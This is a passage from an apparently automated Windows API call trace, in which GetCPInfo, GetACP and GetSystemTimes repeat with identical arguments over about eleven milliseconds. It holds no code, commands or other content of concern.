lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.950] GetACP () returned 0x4e4 [0128.950] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.950] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.950] GetACP () returned 0x4e4 [0128.950] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.950] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.950] GetACP () returned 0x4e4 [0128.950] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.950] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.950] GetACP () returned 0x4e4 [0128.950] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.950] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.950] GetACP () returned 0x4e4 [0128.950] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.950] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.950] GetACP () returned 0x4e4 [0128.950] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.950] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.951] GetACP () returned 0x4e4 [0128.951] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.951] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.951] GetACP () returned 0x4e4 [0128.951] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.951] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.951] GetACP () returned 0x4e4 [0128.951] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.951] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.951] GetACP () returned 0x4e4 [0128.951] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.951] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.951] GetACP () returned 0x4e4 [0128.951] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.951] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.951] GetACP () returned 0x4e4 [0128.951] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.951] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.951] GetACP () returned 0x4e4 [0128.951] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.952] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.952] GetACP () returned 0x4e4 [0128.952] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.952] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.952] GetACP () returned 0x4e4 [0128.952] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.952] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.952] GetACP () returned 0x4e4 [0128.952] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.952] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.952] GetACP () returned 0x4e4 [0128.952] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.952] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.952] GetACP () returned 0x4e4 [0128.952] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.952] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.952] GetACP () returned 0x4e4 [0128.952] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.952] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.952] GetACP () returned 0x4e4 [0128.953] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.953] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.953] GetACP () returned 0x4e4 [0128.953] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.953] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.953] GetACP () returned 0x4e4 [0128.953] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.953] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.953] GetACP () returned 0x4e4 [0128.953] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.953] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.953] GetACP () returned 0x4e4 [0128.953] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.953] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.953] GetACP () returned 0x4e4 [0128.953] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.953] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.953] GetACP () returned 0x4e4 [0128.953] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.954] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.954] GetACP () returned 0x4e4 [0128.954] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.954] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.954] GetACP () returned 0x4e4 [0128.954] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.954] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.954] GetACP () returned 0x4e4 [0128.954] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.954] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.954] GetACP () returned 0x4e4 [0128.954] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.954] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.954] GetACP () returned 0x4e4 [0128.954] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.954] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.954] GetACP () returned 0x4e4 [0128.954] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.954] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.954] GetACP () returned 0x4e4 [0128.954] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.955] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.955] GetACP () returned 0x4e4 [0128.955] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.955] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.955] GetACP () returned 0x4e4 [0128.955] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.955] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.955] GetACP () returned 0x4e4 [0128.955] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.955] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.955] GetACP () returned 0x4e4 [0128.955] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.955] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.955] GetACP () returned 0x4e4 [0128.955] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.955] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.955] GetACP () returned 0x4e4 [0128.955] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.955] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.955] GetACP () returned 0x4e4 [0128.955] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.956] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.956] GetACP () returned 0x4e4 [0128.956] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.956] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.956] GetACP () returned 0x4e4 [0128.956] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.956] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.956] GetACP () returned 0x4e4 [0128.956] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.956] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.956] GetACP () returned 0x4e4 [0128.956] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.956] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.956] GetACP () returned 0x4e4 [0128.956] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.956] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.956] GetACP () returned 0x4e4 [0128.956] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.956] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.956] GetACP () returned 0x4e4 [0128.956] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.957] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.957] GetACP () returned 0x4e4 [0128.957] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.957] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.957] GetACP () returned 0x4e4 [0128.957] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.957] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.957] GetACP () returned 0x4e4 [0128.957] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.957] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.957] GetACP () returned 0x4e4 [0128.957] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.957] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.957] GetACP () returned 0x4e4 [0128.957] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.957] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.957] GetACP () returned 0x4e4 [0128.957] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.957] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.957] GetACP () returned 0x4e4 [0128.957] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.958] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.958] GetACP () returned 0x4e4 [0128.958] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.958] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.958] GetACP () returned 0x4e4 [0128.958] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.958] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.958] GetACP () returned 0x4e4 [0128.958] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.958] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.958] GetACP () returned 0x4e4 [0128.958] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.958] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.958] GetACP () returned 0x4e4 [0128.958] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.958] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.958] GetACP () returned 0x4e4 [0128.958] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.958] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.958] GetACP () returned 0x4e4 [0128.958] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.959] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.959] GetACP () returned 0x4e4 [0128.959] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.959] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.959] GetACP () returned 0x4e4 [0128.959] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.959] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.959] GetACP () returned 0x4e4 [0128.959] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.959] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.959] GetACP () returned 0x4e4 [0128.959] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.959] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.959] GetACP () returned 0x4e4 [0128.959] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.959] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.959] GetACP () returned 0x4e4 [0128.959] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.960] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.960] GetACP () returned 0x4e4 [0128.960] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.960] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.960] GetACP () returned 0x4e4 [0128.960] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.960] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.960] GetACP () returned 0x4e4 [0128.960] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.960] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.960] GetACP () returned 0x4e4 [0128.960] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.960] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.960] GetACP () returned 0x4e4 [0128.960] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.960] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.960] GetACP () returned 0x4e4 [0128.960] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.960] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.960] GetACP () returned 0x4e4 [0128.960] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.961] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.961] GetACP () returned 0x4e4 [0128.961] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.961] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.961] GetACP () returned 0x4e4 [0128.961] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.961] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.961] GetACP () returned 0x4e4 [0128.961] GetSystemTimes (in: lpIdleTime=0x18fa70, 